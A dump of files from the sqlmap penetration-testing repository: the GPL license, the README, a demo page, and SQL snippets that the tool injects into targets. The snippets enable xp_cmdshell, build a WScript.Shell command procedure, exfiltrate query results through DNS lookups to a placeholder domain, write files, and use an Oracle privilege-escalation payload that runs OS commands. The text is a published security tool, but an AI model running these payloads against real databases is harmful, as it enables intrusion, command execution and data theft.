valid names for the first argument in a metaclass class method.\nvalid-metaclass-classmethod-first-arg=mcs\n\n# List of member names, which should be excluded from the protected access\n# warning.\nexclude-protected=_asdict,_fields,_replace,_source,_make\n\n\n[EXCEPTIONS]\n\n# Exceptions that will emit a warning when being caught. Defaults to\n# \"Exception\"\novergeneral-exceptions=Exception\n"
  },
  {
    "path": "sqlmap/LICENSE",
    "content": "COPYING -- Describes the terms under which sqlmap is distributed. A copy\nof the GNU General Public License (GPL) is appended to this file.\n\nsqlmap is (C) 2006-2022 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.\n\nThis program is free software; you may redistribute and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation; Version 2 (or later) with the clarifications and\nexceptions described below. This guarantees your right to use, modify, and\nredistribute this software under certain conditions. If you wish to embed\nsqlmap technology into proprietary software, we sell alternative licenses\n(contact sales@sqlmap.org).\n\nNote that the GPL places important restrictions on \"derived works\", yet it\ndoes not provide a detailed definition of that term. To avoid\nmisunderstandings, we interpret that term as broadly as copyright law\nallows. For example, we consider an application to constitute a \"derived\nwork\" for the purpose of this license if it does any of the following:\n* Integrates source code from sqlmap.\n* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml\n* Executes sqlmap and parses the results (as opposed to typical shell or\n  execution-menu apps, which simply display raw sqlmap output and so are\n  not derivative works).\n* Integrates/includes/aggregates sqlmap into a proprietary executable\n  installer, such as those produced by InstallShield.\n* Links to a library or executes a program that does any of the above\n\nThe term \"sqlmap\" should be taken to also include any portions or derived\nworks of sqlmap. This list is not exclusive, but is meant to clarify our\ninterpretation of derived works with some common examples. Our\ninterpretation applies only to sqlmap - we do not speak for other people's\nGPL works.\n\nThis license does not apply to the third-party components. More details can\nbe found inside the file 'doc/THIRD-PARTY.md'.\n\nIf you have any questions about the GPL licensing restrictions on using\nsqlmap in non-GPL works, we would be happy to help. As mentioned above,\nwe also offer alternative license to integrate sqlmap into proprietary\napplications and appliances.\n\nIf you received these files with a written license agreement or contract\nstating terms other than the terms above, then that alternative license\nagreement takes precedence over these comments.\n\nSource is provided to this software because we believe users have a right\nto know exactly what a program is going to do before they run it.\n\nSource code also allows you to fix bugs and add new features. You are\nhighly encouraged to send your changes to dev@sqlmap.org for possible\nincorporation into the main distribution. By sending these changes to the\nsqlmap developers or via Git pull request, checking them into the sqlmap\nsource code repository, it is understood (unless you specify otherwise)\nthat you are offering the sqlmap project the unlimited, non-exclusive\nright to reuse, modify, and relicense the code. sqlmap will always be\navailable Open Source, but this is important because the inability to\nrelicense code has caused devastating problems for other Free Software\nprojects (such as KDE and NASM). If you wish to specify special license\nconditions of your contributions, just say so when you send them.\n\nThis program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License v2.0 for more details at\nhttp://www.gnu.org/licenses/gpl-2.0.html, or below\n\n****************************************************************************\n\n                    GNU GENERAL PUBLIC LICENSE\n                       Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n                            Preamble\n\n  The licenses for most software are designed to take away your\nfreedom to share and change it.  By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users.  This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it.  (Some other Free Software Foundation software is covered by\nthe GNU Lesser General Public License instead.)  You can apply it to\nyour programs, too.\n\n  When we speak of free software, we are referring to freedom, not\nprice.  Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n  To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n  For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have.  You must make sure that they, too, receive or can get the\nsource code.  And you must show them these terms so they know their\nrights.\n\n  We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n  Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware.  If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n  Finally, any free program is threatened constantly by software\npatents.  We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary.  To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n  The precise terms and conditions for copying, distribution and\nmodification follow.\n\n                    GNU GENERAL PUBLIC LICENSE\n   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n  0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License.  The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage.  (Hereinafter, translation is included without limitation in\nthe term \"modification\".)  Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope.  The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n  1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n  2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n    a) You must cause the modified files to carry prominent notices\n    stating that you changed the files and the date of any change.\n\n    b) You must cause any work that you distribute or publish, that in\n    whole or in part contains or is derived from the Program or any\n    part thereof, to be licensed as a whole at no charge to all third\n    parties under the terms of this License.\n\n    c) If the modified program normally reads commands interactively\n    when run, you must cause it, when started running for such\n    interactive use in the most ordinary way, to print or display an\n    announcement including an appropriate copyright notice and a\n    notice that there is no warranty (or else, saying that you provide\n    a warranty) and that users may redistribute the program under\n    these conditions, and telling the user how to view a copy of this\n    License.  (Exception: if the Program itself is interactive but\n    does not normally print such an announcement, your work based on\n    the Program is not required to print an announcement.)\n\nThese requirements apply to the modified work as a whole.  If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works.  But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n  3. You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n    a) Accompany it with the complete corresponding machine-readable\n    source code, which must be distributed under the terms of Sections\n    1 and 2 above on a medium customarily used for software interchange; or,\n\n    b) Accompany it with a written offer, valid for at least three\n    years, to give any third party, for a charge no more than your\n    cost of physically performing source distribution, a complete\n    machine-readable copy of the corresponding source code, to be\n    distributed under the terms of Sections 1 and 2 above on a medium\n    customarily used for software interchange; or,\n\n    c) Accompany it with the information you received as to the offer\n    to distribute corresponding source code.  (This alternative is\n    allowed only for noncommercial distribution and only if you\n    received the program in object code or executable form with such\n    an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it.  For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable.  However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\n  4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License.  Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n  5. You are not required to accept this License, since you have not\nsigned it.  However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works.  These actions are\nprohibited by law if you do not accept this License.  Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n  6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions.  You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n  7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License.  If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all.  For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices.  Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\n  8. If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded.  In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n  9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time.  Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number.  If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation.  If the Program does not specify a version number of\nthis License, you may choose any version ever published by the Free Software\nFoundation.\n\n  10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission.  For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this.  Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n                            NO WARRANTY\n\n  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n                     END OF TERMS AND CONDITIONS\n"
  },
  {
    "path": "sqlmap/README.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.\n\nScreenshots\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nYou can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.\n\nInstallation\n----\n\nYou can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nPreferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.\n\nUsage\n----\n\nTo get a list of basic options and switches use:\n\n    python sqlmap.py -h\n\nTo get a list of all options and switches use:\n\n    python sqlmap.py -hh\n\nYou can find a sample run [here](https://asciinema.org/a/46601).\nTo get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nLinks\n----\n\n* Homepage: https://sqlmap.org\n* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n* User's manual: https://github.com/sqlmapproject/sqlmap/wiki\n* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n\nTranslations\n----\n\n* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)\n* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)\n* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)\n* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)\n* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)\n* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)\n* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)\n* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)\n* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)\n* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)\n* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)\n* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)\n* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)\n* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)\n* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)\n* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)\n* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)\n* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)\n* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)\n* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)\n* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)\n"
  },
  {
    "path": "sqlmap/data/html/index.html",
    "content": "<!DOCTYPE html>\n\n<!-- https://angrytools.com/bootstrap/editor/ -->\n\n<html lang=\"en\">\n<head>\n    <title>DEMO</title>\n    <meta charset=\"utf-8\">\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <link href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n    <link href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css\" rel=\"stylesheet\">\n\n    <!--[if lt IE 9]><script src=\"https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js\"></script><script src=\"https://oss.maxcdn.com/respond/1.4.2/respond.min.js\"></script><![endif]-->\n</head>\n<body>\n    <style>\n  #wrapper { width: 100%; }\n\n  #page-wrapper {\n    padding: 0 15px;\n    min-height: 568px;\n    background-color: #fff;\n  }\n\n  @media(min-width:768px) {\n    #page-wrapper {\n      position: inherit;\n      margin: 0 0 0 250px;\n      padding: 0 30px;\n      border-left: 1px solid #e7e7e7;\n    }\n  }\n\n  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }\n  .sidebar .sidebar-search { padding: 15px; }\n  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }\n\n  .sidebar ul li a.active { background-color: #eee; }\n\n  .sidebar .arrow { float: right;}\n  .sidebar .fa.arrow:before { content: \"f104\";}\n  .sidebar .active>a>.fa.arrow:before { content: \"f107\"; }\n  .sidebar .nav-second-level li,\n  .sidebar .nav-third-level li {\n    border-bottom: 0!important;\n  }\n\n  .sidebar .nav-second-level li a { padding-left: 37px; }\n  .sidebar .nav-third-level li a { padding-left: 52px; }\n\n  @media(min-width:768px) {\n    .sidebar {\n      z-index: 1;\n      position: absolute;\n      width: 250px;\n      margin-top: 51px;\n    }\n  }\n</style>\n<div id=\"wrapper\">\n\n  <nav class=\"navbar navbar-default navbar-static-top\" role=\"navigation\" style=\"margin-bottom: 0\">\n    <div class=\"navbar-header\">\n      <button type=\"button\" class=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\".navbar-collapse\">\n        <span class=\"sr-only\">Toggle navigation</span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n      </button>\n      <a class=\"navbar-brand\" href=\"index.html\">sqlmap</a>\n    </div>\n\n    <div class=\"navbar-default sidebar\" role=\"navigation\">\n      <div class=\"sidebar-nav navbar-collapse\">\n        <ul class=\"nav\" id=\"side-menu\">\n          <li>\n            <a href=\"#\"><em class=\"glyphicon glyphicon-home\"></em> Options<span class=\"arrow\"></span></a>\n            <ul class=\"nav nav-second-level\">\n              <li><a>Target</a></li>\n              <li><a>Request</a></li>\n              <li><a>Optimization</a></li>\n              <li><a>Injection</a></li>\n              <li><a>Detection</a></li>\n              <li><a>Techniques</a></li>\n              <li><a>Fingerprint</a></li>\n              <li><a>Enumeration</a></li>\n              <li><a>Brute force</a></li>\n              <li><a>User-defined function injection</a></li>\n              <li><a>File system access</a></li>\n              <li><a>Operating system access</a></li>\n              <li><a>Windows registry access</a></li>\n              <li><a>General</a></li>\n              <li><a>Miscellaneous</a></li>\n            </ul>\n          </li>\n        </ul>\n      </div>\n    </div>\n  </nav>\n\n  <div id=\"page-wrapper\">\n    <div class=\"row\">\n      <h4>DEMO</h4>\n    </div>\n  </div>\n</div>\n<script>\n  /*\n * metismenu - v1.0.3\n * Easy menu jQuery plugin for Twitter Bootstrap 3\n * https://github.com/onokumus/metisMenu\n *\n * Made by Osman Nuri Okumuş\n * Under MIT License\n*/\n  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e=\"metisMenu\",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find(\"li.active\").has(\"ul\").children(\"ul\").collapse(\"show\"),b.find(\"li\").not(\".active\").has(\"ul\").children(\"ul\").collapse(\"hide\")):(b.find(\"li.active\").has(\"ul\").children(\"ul\").addClass(\"collapse in\"),b.find(\"li\").not(\".active\").has(\"ul\").children(\"ul\").addClass(\"collapse\")),b.find(\"li\").has(\"ul\").children(\"a\").on(\"click\",function(b){b.preventDefault(),a(this).parent(\"li\").toggleClass(\"active\").children(\"ul\").collapse(\"toggle\"),c&&a(this).parent(\"li\").siblings().removeClass(\"active\").children(\"ul.in\").collapse(\"hide\")})},isIE:function(){for(var a,b=3,d=c.createElement(\"div\"),e=d.getElementsByTagName(\"i\");d.innerHTML=\"<!--[if gt IE \"+ ++b+\"]><i></i><![endif]-->\",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,\"plugin_\"+e)||a.data(this,\"plugin_\"+e,new d(this,b))})}}(jQuery,window,document);\n\n  $(function() {\n\n    $('#side-menu').metisMenu();\n\n  });\n\n  //Loads the correct sidebar on window load,\n  //collapses the sidebar on window resize.\n  // Sets the min-height of #page-wrapper to window size\n  $(function() {\n    $(window).bind(\"load resize\", function() {\n      topOffset = 50;\n      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;\n      if (width < 768) {\n        $('div.navbar-collapse').addClass('collapse')\n        topOffset = 100; // 2-row-menu\n      } else {\n        $('div.navbar-collapse').removeClass('collapse')\n      }\n\n      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;\n      height = height - topOffset;\n      if (height < 1) height = 1;\n      if (height > topOffset) {\n        $(\"#page-wrapper\").css(\"min-height\", (height) + \"px\");\n      }\n    })\n  });\n</script>\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js\"></script>\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js\"></script>\n</body>\n</html>\n"
  },
  {
    "path": "sqlmap/data/procs/README.txt",
    "content": "Files in this folder represent SQL snippets used by sqlmap on the target\nsystem.\nThey are licensed under the terms of the GNU Lesser General Public License\nwhere not specified otherwise.\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/activate_sp_oacreate.sql",
    "content": "EXEC master..sp_configure 'show advanced options',1;\nRECONFIGURE WITH OVERRIDE;\nEXEC master..sp_configure 'ole automation procedures',1;\nRECONFIGURE WITH OVERRIDE\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/configure_openrowset.sql",
    "content": "EXEC master..sp_configure 'show advanced options', 1;\nRECONFIGURE WITH OVERRIDE;\nEXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;\nRECONFIGURE WITH OVERRIDE;\nEXEC sp_configure 'show advanced options', 0;\nRECONFIGURE WITH OVERRIDE\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/configure_xp_cmdshell.sql",
    "content": "EXEC master..sp_configure 'show advanced options',1;\nRECONFIGURE WITH OVERRIDE;\nEXEC master..sp_configure 'xp_cmdshell',%ENABLE%;\nRECONFIGURE WITH OVERRIDE;\nEXEC master..sp_configure 'show advanced options',0;\nRECONFIGURE WITH OVERRIDE\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/create_new_xp_cmdshell.sql",
    "content": "DECLARE @%RANDSTR% nvarchar(999);\nset @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';\nEXEC master..sp_executesql @%RANDSTR%\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql",
    "content": "EXEC master..sp_dropextendedproc 'xp_cmdshell'\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/dns_request.sql",
    "content": "DECLARE @host varchar(1024);\nSELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';\nEXEC('master..xp_dirtree \"\\\\'+@host+'\\%RANDSTR1%\"')\n# or EXEC('master..xp_fileexist \"\\\\'+@host+'\\%RANDSTR1%\"')\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql",
    "content": "EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'\n"
  },
  {
    "path": "sqlmap/data/procs/mssqlserver/run_statement_as_user.sql",
    "content": "SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')\n# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')\n# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')\n"
  },
  {
    "path": "sqlmap/data/procs/mysql/dns_request.sql",
    "content": "SELECT LOAD_FILE(CONCAT('\\\\\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR1%'))\n"
  },
  {
    "path": "sqlmap/data/procs/mysql/write_file_limit.sql",
    "content": "LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -\n"
  },
  {
    "path": "sqlmap/data/procs/oracle/dns_request.sql",
    "content": "SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL\n# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL\n"
  },
  {
    "path": "sqlmap/data/procs/oracle/read_file_export_extension.sql",
    "content": "SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"OsUtil\" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL\nSELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' 